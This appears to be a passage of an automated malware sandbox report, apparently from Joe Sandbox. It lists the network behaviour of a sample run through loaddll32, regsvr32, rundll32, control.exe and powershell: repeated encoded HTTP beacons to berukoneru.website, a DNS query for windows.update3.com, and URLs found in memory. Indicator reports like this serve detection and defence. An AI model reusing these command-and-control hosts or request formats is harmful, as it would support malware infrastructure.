          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: global trafficHTTP traffic detected: GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655671376.0000000003335000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471079940.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.674023978.0000000003336000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.654359694.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655489490.000000000332C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.654149765.00000164EB229000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.667097557.00000164EB22A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: powershell.exe, 00000018.00000003.653604031.00000164EB3D9000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.555671260.00000164EB3D4000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoftq
          Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mic
          Source: powershell.exe, 00000018.00000002.669107613.00000164D2D91000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.651339407.000002DABC551000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
          Source: loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/MicrosoftEdgeDownload&quot;
          Source: regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/
          Source: regsvr32.exe, 00000003.00000003.520125804.000000000330C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527683209.0000000003310000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf
          Source: regsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpString found in binary or memory: https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uq
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax&quot;
          Source: loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xvsU?ver=e636&quot;
          Source: powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/P
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/i
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmpString found in binary or memory: https://windows.update3.com/tire/vuHeqIQ3bqpSw_2Byc/c_2BB_2Fi/KRLpI_2FLMzbCYIdYZV9/wMp8vpBadTBEn6lom
          Source: unknownDNS traffic detected: queries for: windows.update3.com
          Source: global trafficHTTP traffic detected: GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
